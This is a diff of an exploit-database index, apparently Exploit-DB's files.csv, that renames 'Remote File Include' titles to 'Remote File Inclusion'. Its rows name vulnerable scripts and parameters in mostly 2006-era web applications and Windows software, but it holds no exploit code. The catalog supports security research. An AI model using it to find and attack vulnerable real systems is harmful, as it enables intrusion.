2.0 admin/authors.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 @@ -25160,15 +25160,15 @@ id,file,description,date,author,platform,type,port 28095,platforms/php/webapps/28095.txt,"SoftBiz Dating Script 1.0 index.php cid Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 28096,platforms/php/webapps/28096.txt,"SoftBiz Dating Script 1.0 news_desc.php id Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 28097,platforms/php/webapps/28097.txt,"Dating Agent 4.7.1 - Multiple Input Validation Vulnerabilities",2006-06-22,"EllipSiS Security",php,webapps,0 -28098,platforms/php/webapps/28098.txt,"PHP Blue Dragon CMS 2.9.1 - Multiple Remote File Include Vulnerabilities",2006-06-22,Shm,php,webapps,0 +28098,platforms/php/webapps/28098.txt,"PHP Blue Dragon CMS 2.9.1 - Multiple Remote File Inclusion Vulnerabilities",2006-06-22,Shm,php,webapps,0 28099,platforms/windows/dos/28099.txt,"Yahoo! Messenger 7.0/7.5 jscript.dll Non-Ascii Character DoS",2006-06-23,"Ivan Ivan",windows,dos,0 28100,platforms/cfm/dos/28100.txt,"BlueDragon Server 6.2.1 - (.cfm) Denial of Service",2006-06-23,"Tan Chew Keong",cfm,dos,0 28101,platforms/php/webapps/28101.txt,"Custom Dating Biz 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0 28102,platforms/php/webapps/28102.txt,"Winged Gallery 1.0 Thumb.php Cross-Site Scripting",2006-06-24,Luny,php,webapps,0 28103,platforms/windows/dos/28103.pl,"MailEnable 1.x SMTP HELO Command Remote Denial of Service",2006-06-24,db0,windows,dos,0 28104,platforms/php/webapps/28104.txt,"ADOdb 4.6/4.7 Tmssql.php Cross-Site Scripting",2006-06-26,"Rodrigo Silva",php,webapps,0 -28105,platforms/php/webapps/28105.txt,"eNpaper1 Root_Header.php Remote File Include",2006-06-26,almaster,php,webapps,0 -28106,platforms/php/webapps/28106.txt,"Bee-hive 1.2 - Multiple Remote File Include Vulnerabilities",2006-06-16,Kw3[R]Ln,php,webapps,0 +28105,platforms/php/webapps/28105.txt,"eNpaper1 Root_Header.php Remote File Inclusion",2006-06-26,almaster,php,webapps,0 +28106,platforms/php/webapps/28106.txt,"Bee-hive 1.2 - Multiple Remote File Inclusion Vulnerabilities",2006-06-16,Kw3[R]Ln,php,webapps,0 28107,platforms/php/webapps/28107.txt,"Cpanel 10 Select.HTML Cross-Site Scripting",2006-06-26,preth00nker,php,webapps,0 28108,platforms/php/webapps/28108.txt,"MyMail 1.0 Login.php Cross-Site Scripting",2006-06-26,botan,php,webapps,0 28109,platforms/php/webapps/28109.txt,"Usenet 0.5 Index.php Cross-Site Scripting",2006-06-23,Luny,php,webapps,0 @@ -25176,10 +25176,10 @@ id,file,description,date,author,platform,type,port 28111,platforms/php/webapps/28111.txt,"OpenGuestbook 0.5 header.php title Parameter XSS",2006-06-26,simo64,php,webapps,0 28112,platforms/php/webapps/28112.txt,"OpenGuestbook 0.5 view.php offset Parameter SQL Injection",2006-06-26,simo64,php,webapps,0 28113,platforms/php/webapps/28113.txt,"cPanel 10.8.1/10.8.2 OnMouseover Cross-Site Scripting",2006-06-27,MexHackTeam.org,php,webapps,0 -28114,platforms/php/webapps/28114.txt,"CrisoftRicette 1.0 Cookbook.php Remote File Include",2006-06-27,CrAzY.CrAcKeR,php,webapps,0 +28114,platforms/php/webapps/28114.txt,"CrisoftRicette 1.0 Cookbook.php Remote File Inclusion",2006-06-27,CrAzY.CrAcKeR,php,webapps,0 28115,platforms/php/webapps/28115.txt,"MF Piadas 1.0 Admin.php Cross-Site Scripting",2006-06-27,botan,php,webapps,0 28116,platforms/java/webapps/28116.txt,"H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-27,r0t,java,webapps,0 -28117,platforms/php/webapps/28117.txt,"MF Piadas 1.0 Admin.php Remote File Include",2006-06-27,botan,php,webapps,0 +28117,platforms/php/webapps/28117.txt,"MF Piadas 1.0 Admin.php Remote File Inclusion",2006-06-27,botan,php,webapps,0 28118,platforms/windows/remote/28118.html,"Microsoft Internet Explorer 5.0.1 OuterHTML Redirection Handling Information Disclosure",2006-06-27,"Plebo Aesdi Nael",windows,remote,0 28119,platforms/php/webapps/28119.txt,"vCard PRO - gbrowse.php cat_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28120,platforms/php/webapps/28120.txt,"vCard PRO - rating.php card_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 @@ -25201,7 +25201,7 @@ id,file,description,date,author,platform,type,port 28138,platforms/php/webapps/28138.txt,"SoftBiz Banner Exchange Script 1.0 lostpassword.php PHPSESSID Parameter XSS",2006-06-29,securityconnection,php,webapps,0 28139,platforms/php/webapps/28139.txt,"SoftBiz Banner Exchange Script 1.0 gen_confirm_mem.php PHPSESSID Parameter XSS",2006-06-29,securityconnection,php,webapps,0 28140,platforms/php/webapps/28140.txt,"SoftBiz Banner Exchange Script 1.0 index.php PHPSESSID Parameter XSS",2006-06-29,securityconnection,php,webapps,0 -28141,platforms/php/webapps/28141.txt,"SiteBuilder-FX Top.php Remote File Include",2006-06-01,MazaGi,php,webapps,0 +28141,platforms/php/webapps/28141.txt,"SiteBuilder-FX Top.php Remote File Inclusion",2006-06-01,MazaGi,php,webapps,0 28142,platforms/php/webapps/28142.txt,"Diesel Joke Site Category.php SQL Injection",2006-07-01,black-code,php,webapps,0 28143,platforms/php/webapps/28143.pl,"SturGeoN Upload Arbitrary File Upload",2006-07-01,"Jihad BENABRA",php,webapps,0 28144,platforms/windows/dos/28144.txt,"Microsoft Internet Explorer 6.0 OutlookExpress.AddressBook Denial of Service",2006-07-01,hdm,windows,dos,0 @@ -25219,16 +25219,16 @@ id,file,description,date,author,platform,type,port 28156,platforms/php/webapps/28156.txt,"free QBoard 1.1 history.php qb_path Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28157,platforms/php/webapps/28157.txt,"VirtuaStore 2.0 Password Parameter SQL Injection",2006-07-03,supermalhacao,php,webapps,0 28158,platforms/php/webapps/28158.txt,"QTO File Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-07-03,"EllipSiS Security",php,webapps,0 -28159,platforms/php/webapps/28159.txt,"Glossaire 1.7 - Remote File Include",2006-07-03,"CrAzY CrAcKeR",php,webapps,0 +28159,platforms/php/webapps/28159.txt,"Glossaire 1.7 - Remote File Inclusion",2006-07-03,"CrAzY CrAcKeR",php,webapps,0 28160,platforms/linux/dos/28160.txt,"Gentoo-Specific MPG123 - URI Remote Buffer Overflow",2006-07-03,"Horst Schirmeier",linux,dos,0 28161,platforms/php/webapps/28161.txt,"PHPWebGallery 1.x Comments.php Cross-Site Scripting",2006-07-04,iss4m,php,webapps,0 -28162,platforms/php/webapps/28162.txt,"Randshop 0.9.3/1.2 Index.php Remote File Include",2006-07-04,black-code,php,webapps,0 +28162,platforms/php/webapps/28162.txt,"Randshop 0.9.3/1.2 Index.php Remote File Inclusion",2006-07-04,black-code,php,webapps,0 28163,platforms/php/webapps/28163.txt,"PostNuke 0.6x/0.7x Multiple Cross-Site Scripting Vulnerabilities",2006-07-04,rgod,php,webapps,0 28164,platforms/windows/dos/28164.html,"Microsoft Internet Explorer 6.0 Href Title Denial of Service",2006-07-04,jsz,windows,dos,0 28165,platforms/osx/dos/28165.html,"Apple Safari Web Browser 2.0.4 DHTML SetAttributeNode() Null Dereference Denial of Service",2006-07-05,"Dennis Cox",osx,dos,0 28166,platforms/php/webapps/28166.pl,"LifeType 1.0.5 Index.php Date Parameter SQL Injection",2006-07-05,"Alejandro Ramos",php,webapps,0 28167,platforms/php/webapps/28167.txt,"Invision Power Board 1.x/2.x - Multiple SQL Injection Vulnerabilities",2006-07-05,"CrAzY CrAcKeR",php,webapps,0 -28168,platforms/php/webapps/28168.txt,"Blog:CMS 4.1 Thumb.php Remote File Include",2006-07-05,"EllipSiS Security",php,webapps,0 +28168,platforms/php/webapps/28168.txt,"Blog:CMS 4.1 Thumb.php Remote File Inclusion",2006-07-05,"EllipSiS Security",php,webapps,0 28169,platforms/windows/dos/28169.html,"Microsoft Internet Explorer 5.0.1/6.0 Structured Graphics Control Denial of Service",2006-07-06,hdm,windows,dos,0 28170,platforms/windows/remote/28170.rb,"freeFTPd 1.0.10 PASS Command SEH Overflow (Metasploit)",2013-09-09,"Muhamad Fadzil Ramli",windows,remote,21 28171,platforms/php/webapps/28171.txt,"Zyxware Health Monitoring System - Multiple Vulnerabilities",2013-09-09,"Sarahma Security",php,webapps,0 @@ -25249,16 +25249,16 @@ id,file,description,date,author,platform,type,port 28187,platforms/windows/remote/28187.rb,"Microsoft Internet Explorer CAnchorElement Use-After-Free (MS13-055)",2013-09-10,Metasploit,windows,remote,0 28188,platforms/windows/remote/28188.rb,"HP SiteScope - Remote Code Execution (2)",2013-09-10,Metasploit,windows,remote,8080 28189,platforms/windows/remote/28189.txt,"Microsoft Excel 2000-2004 Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,windows,remote,0 -28190,platforms/php/webapps/28190.txt,"ExtCalendar 2.0 ExtCalendar.php Remote File Include",2006-07-07,Matdhule,php,webapps,0 +28190,platforms/php/webapps/28190.txt,"ExtCalendar 2.0 ExtCalendar.php Remote File Inclusion",2006-07-07,Matdhule,php,webapps,0 28191,platforms/php/webapps/28191.txt,"AjaXplorer 1.0 - Multiple Vulnerabilities",2013-09-10,"Trustwave's SpiderLabs",php,webapps,0 28192,platforms/php/webapps/28192.txt,"ATutor 1.5.3 - Multiple Input Validation Vulnerabilities",2006-07-08,securityconnection,php,webapps,0 28193,platforms/asp/webapps/28193.txt,"Webvizyon SayfalaAltList.ASP SQL Injection",2006-07-08,StorMBoY,asp,webapps,0 28194,platforms/windows/dos/28194.txt,"Microsoft Internet Explorer 6 RDS.DataControl Denial of Service",2006-07-08,hdm,windows,dos,0 -28195,platforms/php/webapps/28195.txt,"RW::Download Stats.php Remote File Include",2006-07-08,StorMBoY,php,webapps,0 +28195,platforms/php/webapps/28195.txt,"RW::Download Stats.php Remote File Inclusion",2006-07-08,StorMBoY,php,webapps,0 28196,platforms/windows/dos/28196.txt,"Microsoft Internet Explorer 6.0 DirectAnimation.DAUserData Denial of Service",2006-07-08,hdm,windows,dos,0 28197,platforms/windows/dos/28197.txt,"Microsoft Internet Explorer 6.0 Object.Microsoft.DXTFilter Denial of Service",2006-07-09,hdm,windows,dos,0 28198,platforms/windows/remote/28198.py,"Microsoft Office 2000/2002 Property Code Execution",2006-07-11,anonymous,windows,remote,0 -28199,platforms/php/webapps/28199.txt,"PHPBB 1.2.4 For Mambo Multiple Remote File Include Vulnerabilities",2006-07-09,h4ntu,php,webapps,0 +28199,platforms/php/webapps/28199.txt,"PHPBB 1.2.4 For Mambo Multiple Remote File Inclusion Vulnerabilities",2006-07-09,h4ntu,php,webapps,0 28200,platforms/php/webapps/28200.txt,"Farsinews 3.0 Tiny_mce_gzip.php Directory Traversal",2006-07-10,armin390,php,webapps,0 28201,platforms/php/webapps/28201.txt,"Graffiti Forums 1.0 Topics.php SQL Injection",2006-07-10,Paisterist,php,webapps,0 28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6.0 HtmlDlgSafeHelper Remote Denial of Service",2006-07-10,hdm,windows,dos,0 @@ -25274,14 +25274,14 @@ id,file,description,date,author,platform,type,port 28212,platforms/php/webapps/28212.txt,"Lazarus Guestbook 1.6 picture.php img Parameter XSS",2006-07-12,simo64,php,webapps,0 28213,platforms/windows/dos/28213.txt,"Microsoft Internet Explorer 6.0 RevealTrans Denial of Service",2006-07-12,hdm,windows,dos,0 28214,platforms/php/webapps/28214.txt,"PhotoCycle 1.0 PhotoCycle.php Parameter Cross-Site Scripting",2006-07-13,Luny,php,webapps,0 -28215,platforms/php/webapps/28215.txt,"PHP Event Calendar 1.4 Calendar.php Remote File Include",2006-07-13,Solpot,php,webapps,0 -28216,platforms/php/webapps/28216.txt,"FlatNuke 2.5.7 Index.php Remote File Include",2006-07-13,rgod,php,webapps,0 -28217,platforms/php/webapps/28217.txt,"Forum 5 PM.php Local File Include",2006-07-13,rgod,php,webapps,0 +28215,platforms/php/webapps/28215.txt,"PHP Event Calendar 1.4 Calendar.php Remote File Inclusion",2006-07-13,Solpot,php,webapps,0 +28216,platforms/php/webapps/28216.txt,"FlatNuke 2.5.7 Index.php Remote File Inclusion",2006-07-13,rgod,php,webapps,0 +28217,platforms/php/webapps/28217.txt,"Forum 5 PM.php Local File Inclusion",2006-07-13,rgod,php,webapps,0 28218,platforms/php/webapps/28218.txt,"Koobi Pro 5.6 showtopic Module toid Parameter XSS",2006-07-13,"Evampire chiristof",php,webapps,0 28219,platforms/php/webapps/28219.txt,"Koobi Pro 5.6 showtopic Module toid Parameter SQL Injection",2006-07-13,"Evampire chiristof",php,webapps,0 28220,platforms/linux/dos/28220.txt,"KDE Konqueror 3.5.x ReplaceChild Denial of Service",2006-07-14,hdm,linux,dos,0 28222,platforms/windows/dos/28222.txt,"Microsoft Works 8.0 Spreadsheet - Multiple Vulnerabilities",2006-06-14,"Benjamin Franz",windows,dos,0 -28223,platforms/php/webapps/28223.txt,"Subberz Lite UserFunc Remote File Include",2006-07-14,"Chironex Fleckeri",php,webapps,0 +28223,platforms/php/webapps/28223.txt,"Subberz Lite UserFunc Remote File Inclusion",2006-07-14,"Chironex Fleckeri",php,webapps,0 28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 mso.dll PPT Processing Unspecified Code Execution",2006-07-14,"naveed afzal",windows,remote,0 28225,platforms/windows/remote/28225.c,"Microsoft PowerPoint 2003 powerpnt.exe Unspecified Issue",2006-07-14,"naveed afzal",windows,remote,0 28226,platforms/windows/remote/28226.c,"Microsoft PowerPoint 2003 PPT File Closure Memory Corruption",2006-07-14,"naveed afzal",windows,remote,0 @@ -25289,9 +25289,9 @@ id,file,description,date,author,platform,type,port 28228,platforms/hardware/dos/28228.txt,"Sunbelt Kerio Personal Firewall 4.3.426 CreateRemoteThread Denial of Service",2006-07-15,"David Matousek",hardware,dos,0 28229,platforms/php/webapps/28229.txt,"VisNetic Mail Server 8.3.5 - Multiple File Include Vulnerabilities",2006-07-17,"Tan Chew Keong",php,webapps,0 28230,platforms/hardware/dos/28230.txt,"Multiple D-Link Routers UPNP Buffer Overflow",2006-07-17,"Barnaby Jack",hardware,dos,0 -28231,platforms/php/webapps/28231.txt,"ListMessenger 0.9.3 LM_Path Parameter Remote File Include",2006-07-17,xoron,php,webapps,0 +28231,platforms/php/webapps/28231.txt,"ListMessenger 0.9.3 LM_Path Parameter Remote File Inclusion",2006-07-17,xoron,php,webapps,0 28232,platforms/windows/dos/28232.txt,"Agnitum Outpost Firewall 3.5.631 FiltNT.SYS Local Denial of Service",2006-07-17,"Bipin Gautam",windows,dos,0 -28233,platforms/php/webapps/28233.txt,"Calendar Module 1.5.7 For Mambo Com_Calendar.php Remote File Include",2006-07-17,Matdhule,php,webapps,0 +28233,platforms/php/webapps/28233.txt,"Calendar Module 1.5.7 For Mambo Com_Calendar.php Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0 28234,platforms/linux/dos/28234.txt,"MySQL 4.x/5.x Server Date_Format Denial of Service",2006-07-18,"Christian Hammers",linux,dos,0 28235,platforms/windows/remote/28235.c,"RARLAB WinRAR 3.x LHA Filename Handling Buffer Overflow",2006-07-18,"Ryan Smith",windows,remote,0 28236,platforms/ios/webapps/28236.txt,"Talkie Bluetooth Video iFiles 2.0 iOS - Multiple Vulnerabilities",2013-09-12,Vulnerability-Lab,ios,webapps,0 @@ -25303,24 +25303,24 @@ id,file,description,date,author,platform,type,port 28244,platforms/windows/dos/28244.txt,"Microsoft Internet Explorer 6.0 DataSourceControl Denial of Service",2006-07-19,hdm,windows,dos,0 28245,platforms/hardware/remote/28245.pl,"Cisco Security Monitoring Analysis and Response System JBoss Command Execution",2006-07-19,"Jon Hart",hardware,remote,0 28246,platforms/windows/dos/28246.txt,"Microsoft Internet Explorer 6.0 OVCtl Denial of Service",2006-07-19,hdm,windows,dos,0 -28247,platforms/php/webapps/28247.txt,"IDevSpot PHPLinkExchange 1.0 Index.php Remote File Include",2006-07-20,r0t,php,webapps,0 -28248,platforms/php/webapps/28248.txt,"IDevSpot PHPHostBot 1.0 Index.php Remote File Include",2006-07-20,r0t,php,webapps,0 +28247,platforms/php/webapps/28247.txt,"IDevSpot PHPLinkExchange 1.0 Index.php Remote File Inclusion",2006-07-20,r0t,php,webapps,0 +28248,platforms/php/webapps/28248.txt,"IDevSpot PHPHostBot 1.0 Index.php Remote File Inclusion",2006-07-20,r0t,php,webapps,0 28249,platforms/php/webapps/28249.txt,"GeoAuctions 1.0.6 Enterprise index.php d Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products - index.php b Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 -28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 News.php Remote File Include",2006-07-20,AG-Spider,php,webapps,0 +28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 News.php Remote File Inclusion",2006-07-20,AG-Spider,php,webapps,0 28252,platforms/windows/dos/28252.txt,"Microsoft Internet Explorer 6.0 String To Binary Function Denial of Service",2006-07-20,hdm,windows,dos,0 -28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 Common.Inc.php Remote File Include",2006-07-21,Solpot,php,webapps,0 +28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 Common.Inc.php Remote File Inclusion",2006-07-21,Solpot,php,webapps,0 28254,platforms/multiple/remote/28254.txt,"Apache Tomcat 5 Information Disclosure",2006-07-21,"ScanAlert Security",multiple,remote,0 28255,platforms/php/webapps/28255.txt,"Chameleon LE 1.203 Index.php Directory Traversal",2006-07-21,kicktd,php,webapps,0 28256,platforms/windows/dos/28256.html,"Microsoft Internet Explorer 6.0 Internet.HHCtrl Click Denial of Service",2006-07-22,"Alex F",windows,dos,0 28257,platforms/linux/dos/28257.txt,"GnuPG 1.4/1.9 Parse_Comment Remote Buffer Overflow",2006-07-22,"Evgeny Legerov",linux,dos,0 28258,platforms/windows/dos/28258.txt,"Microsoft Internet Explorer 6.0 - Multiple Object ListWidth Property Denial of Service",2006-07-23,hdm,windows,dos,0 28259,platforms/windows/dos/28259.txt,"Microsoft Internet Explorer 6.0 NMSA.ASFSourceMediaDescription Stack Overflow",2006-07-24,hdm,windows,dos,0 -28260,platforms/php/webapps/28260.txt,"Lussumo Vanilla 1.0 RootDirectory Remote File Include",2006-07-24,MFox,php,webapps,0 +28260,platforms/php/webapps/28260.txt,"Lussumo Vanilla 1.0 RootDirectory Remote File Inclusion",2006-07-24,MFox,php,webapps,0 28261,platforms/php/webapps/28261.txt,"RadScripts a_editpage.php filename Variable Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps,0 28262,platforms/php/webapps/28262.txt,"MusicBox 2.3.4 Page Parameter SQL Injection",2006-07-24,"EllipSiS Security",php,webapps,0 28263,platforms/windows/dos/28263.c,"Microsoft Windows XP/2000/2003 - Remote Denial of Service",2006-07-24,"J. Oquendo",windows,dos,0 -28264,platforms/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 Include.PCchess.php Remote File Include",2006-07-24,OLiBekaS,php,webapps,0 +28264,platforms/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 Include.PCchess.php Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0 28265,platforms/windows/dos/28265.txt,"Microsoft Internet Explorer 6.0 Native Function Iterator Denial of Service",2006-07-24,hdm,windows,dos,0 28266,platforms/windows/dos/28266.txt,"AGEphone 1.28/1.38 SIP Packet Handling Buffer Overflow",2006-07-24,"Tan Chew Keong",windows,dos,0 28267,platforms/php/webapps/28267.txt,"LinksCaffe 3.0 links.php Multiple Parameter SQL Injection",2006-07-25,simo64,php,webapps,0 @@ -25343,7 +25343,7 @@ id,file,description,date,author,platform,type,port 28286,platforms/windows/dos/28286.txt,"Microsoft Internet Explorer 6.0 NDFXArtEffects Stack Overflow",2006-07-27,hdm,windows,dos,0 28287,platforms/linux/local/28287.c,"Linux-HA Heartbeat 1.2.3/2.0.x Insecure Default Permissions on Shared Memory",2006-07-27,anonymous,linux,local,0 28288,platforms/linux/local/28288.c,"MidiRecord2 MidiRecord.CC Local Buffer Overflow",2006-07-27,"Dedi Dwianto",linux,local,0 -28289,platforms/php/webapps/28289.txt,"Bosdates 3.x/4.0 Payment.php Remote File Include",2006-07-27,admin@jaascois.com,php,webapps,0 +28289,platforms/php/webapps/28289.txt,"Bosdates 3.x/4.0 Payment.php Remote File Inclusion",2006-07-27,admin@jaascois.com,php,webapps,0 28290,platforms/php/webapps/28290.txt,"MyBulletinBoard 1.x UserCP.php Cross-Site Scripting",2006-07-27,"Roozbeh Afrasiabi",php,webapps,0 28291,platforms/php/webapps/28291.txt,"MyBulletinBoard 1.x UserCP.php Directory Traversal",2006-07-27,"Roozbeh Afrasiabi",php,webapps,0 28292,platforms/php/webapps/28292.txt,"GeoClassifieds Enterprise 2.0.5.x Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-07-27,"EllipSiS Security",php,webapps,0 @@ -25356,7 +25356,7 @@ id,file,description,date,author,platform,type,port 28299,platforms/windows/dos/28299.pl,"Microsoft Windows XP/2000/2003 Graphical Device Interface Plus Library Denial of Service",2006-07-29,"Mr. Niega",windows,dos,0 28300,platforms/php/webapps/28300.txt,"Advanced Webhost Billing System 2.2.2 Contact.php Multiple Cross-Site Scripting Vulnerabilities",2006-07-29,newbinaryfile,php,webapps,0 28301,platforms/windows/dos/28301.txt,"Microsoft Internet Explorer 6.0 Deleted Frame Object Denial of Service",2006-07-29,hdm,windows,dos,0 -28302,platforms/php/webapps/28302.txt,"Liga Manager Online 2.0 Joomla! Component Remote File Include",2006-07-30,vitux.manis,php,webapps,0 +28302,platforms/php/webapps/28302.txt,"Liga Manager Online 2.0 Joomla! Component Remote File Inclusion",2006-07-30,vitux.manis,php,webapps,0 28303,platforms/php/webapps/28303.txt,"X-Scripts X-Protection 1.10 Protect.php SQL Injection",2006-07-29,SirDarckCat,php,webapps,0 28304,platforms/php/webapps/28304.txt,"X-Scripts X-Poll 1.10 Top.php SQL Injection",2006-07-29,SirDarckCat,php,webapps,0 28305,platforms/php/webapps/28305.txt,"Ajax Chat 0.1 operator_chattranscript.php chatid Parameter Traversal Arbitrary File Access",2006-07-31,SirDarckCat,php,webapps,0 @@ -25364,16 +25364,16 @@ id,file,description,date,author,platform,type,port 28307,platforms/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 admin.php Multiple Parameter SQL Injection",2006-07-31,SirDarckCat,php,webapps,0 28308,platforms/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 members.php cfg_root Parameter Remote File Inclusion",2006-07-31,SirDarckCat,php,webapps,0 28309,platforms/php/webapps/28309.txt,"Seir Anphin V666 Community Management System - Multiple SQL Injection Vulnerabilities",2006-07-31,CR,php,webapps,0 -28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component Admin.Moskool.php Remote File Include",2006-07-31,saudi.unix,php,webapps,0 -28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 Myevent.php Remote File Include",2006-07-31,CeNGiZ-HaN,php,webapps,0 +28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component Admin.Moskool.php Remote File Inclusion",2006-07-31,saudi.unix,php,webapps,0 +28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 Myevent.php Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0 28312,platforms/multiple/remote/28312.txt,"VMware ESX 2.x - Multiple Information Disclosure Vulnerabilities",2006-07-31,"Stephen de Vries",multiple,remote,0 28314,platforms/linux/remote/28314.c,"bomberclone 0.11 - Multiple Vulnerabilities",2006-07-31,"Luigi Auriemma",linux,remote,0 28315,platforms/php/webapps/28315.txt,"Help Center Live 2.1.2 Module.php Directory Traversal",2006-07-31,Dr.GooGle,php,webapps,0 28316,platforms/php/webapps/28316.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (2)",2006-07-31,SirDarckCat,php,webapps,0 28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 hsList.php subdir Parameter Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 -28318,platforms/php/webapps/28318.txt,"Knusperleicht Quickie Quick_Path Parameter Remote File Include",2006-08-01,"Kurdish Security",php,webapps,0 -28319,platforms/php/webapps/28319.txt,"Knusperleicht FAQ 1.0 Script Index.php Remote File Include",2006-08-01,"Kurdish Security",php,webapps,0 -28320,platforms/php/webapps/28320.txt,"Knusperleicht GuestBook 3.5 GB_PATH Parameter Remote File Include",2006-08-01,"Kurdish Security",php,webapps,0 +28318,platforms/php/webapps/28318.txt,"Knusperleicht Quickie Quick_Path Parameter Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 +28319,platforms/php/webapps/28319.txt,"Knusperleicht FAQ 1.0 Script Index.php Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 +28320,platforms/php/webapps/28320.txt,"Knusperleicht GuestBook 3.5 GB_PATH Parameter Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 28321,platforms/cgi/webapps/28321.pl,"Barracuda Spam Firewall 3.3.x preview_email.cgi file Parameter Arbitrary File Access",2006-08-01,"Greg Sinclair",cgi,webapps,0 28322,platforms/php/webapps/28322.txt,"TinyPHPForum 3.6 Error.php Information Disclosure",2006-08-01,SirDarckCat,php,webapps,0 28323,platforms/php/webapps/28323.txt,"TinyPHPForum 3.6 UpdatePF.php Authentication Bypass",2006-08-01,SirDarckCat,php,webapps,0 @@ -25402,7 +25402,7 @@ id,file,description,date,author,platform,type,port 28509,platforms/php/webapps/28509.txt,"XHP CMS 0.5.1 Index.php Cross-Site Scripting",2006-09-11,"HACKERS PAL",php,webapps,0 28347,platforms/php/webapps/28347.txt,"XennoBB 2.1 Profile.php Multiple SQL Injection Vulnerabilities",2006-08-07,"Chris Boulton",php,webapps,0 28348,platforms/linux/dos/28348.txt,"Clam Anti-Virus ClamAV 0.88.x UPX Compressed PE File Heap Buffer Overflow",2006-08-07,"Damian Put",linux,dos,0 -28349,platforms/php/webapps/28349.txt,"TurnkeyWebTools PHP Simple Shop 2.0 - Multiple Remote File Include Vulnerabilities",2006-08-07,Matdhule,php,webapps,0 +28349,platforms/php/webapps/28349.txt,"TurnkeyWebTools PHP Simple Shop 2.0 - Multiple Remote File Inclusion Vulnerabilities",2006-08-07,Matdhule,php,webapps,0 28350,platforms/php/webapps/28350.txt,"VWar 1.5 war.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 28351,platforms/php/webapps/28351.txt,"VWar 1.5 member.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 28352,platforms/php/webapps/28352.txt,"VWar 1.5 calendar.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 @@ -25411,91 +25411,91 @@ id,file,description,date,author,platform,type,port 28355,platforms/php/webapps/28355.txt,"VWar 1.5 news.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 28356,platforms/php/webapps/28356.txt,"VWar 1.5 stats.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 28357,platforms/windows/remote/28357.asc,"Microsoft Windows Explorer 2000/2003/XP Drag and Drop Remote Code Execution",2006-07-27,"Plebo Aesdi Nael",windows,remote,0 -28358,platforms/linux/dos/28358.txt,"Linux Kernel <= 2.6.17.7 - NFS and EXT3 Combination Remote Denial of Service",2006-08-07,"James McKenzie",linux,dos,0 -28359,platforms/php/webapps/28359.txt,"PHPPrintAnalyzer 1.1 Index.php Remote File Include",2006-08-07,sh3ll,php,webapps,0 +28358,platforms/linux/dos/28358.txt,"Linux Kernel 2.6.17.7 - NFS and EXT3 Combination Remote Denial of Service",2006-08-07,"James McKenzie",linux,dos,0 +28359,platforms/php/webapps/28359.txt,"PHPPrintAnalyzer 1.1 Index.php Remote File Inclusion",2006-08-07,sh3ll,php,webapps,0 28360,platforms/windows/remote/28360.c,"EasyCafe 2.1/2.2 Security Restriction Bypass",2006-08-07,"Mobin Yazarlou",windows,remote,0 28361,platforms/multiple/dos/28361.c,"Festalon 0.5 HES Files Remote Heap Buffer Overflow",2006-08-07,"Luigi Auriemma",multiple,dos,0 28362,platforms/php/webapps/28362.txt,"Simple One File Guestbook 1.0 Security Bypass",2006-08-09,omnipresent,php,webapps,0 28363,platforms/php/webapps/28363.txt,"CLUB Nuke 2.0 - Multiple SQL-Injection",2006-08-09,ASIANEAGLE,php,webapps,0 28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 Profile.php Directory Traversal",2006-08-09,"Chris Boulton",php,webapps,0 28365,platforms/multiple/remote/28365.txt,"Apache 2.2.2 - CGI Script Source Code Information Disclosure",2006-08-09,"Susam Pal",multiple,remote,0 -28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x Mybloggie_Root_Path Parameter Multiple Remote File Include Vulnerabilities",2006-06-02,sh3ll,php,webapps,0 +28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x Mybloggie_Root_Path Parameter Multiple Remote File Inclusion Vulnerabilities",2006-06-02,sh3ll,php,webapps,0 28367,platforms/linux/dos/28367.txt,"AlsaPlayer 0.99.x - Multiple Buffer Overflow Vulnerabilities",2006-08-09,"Luigi Auriemma",linux,dos,0 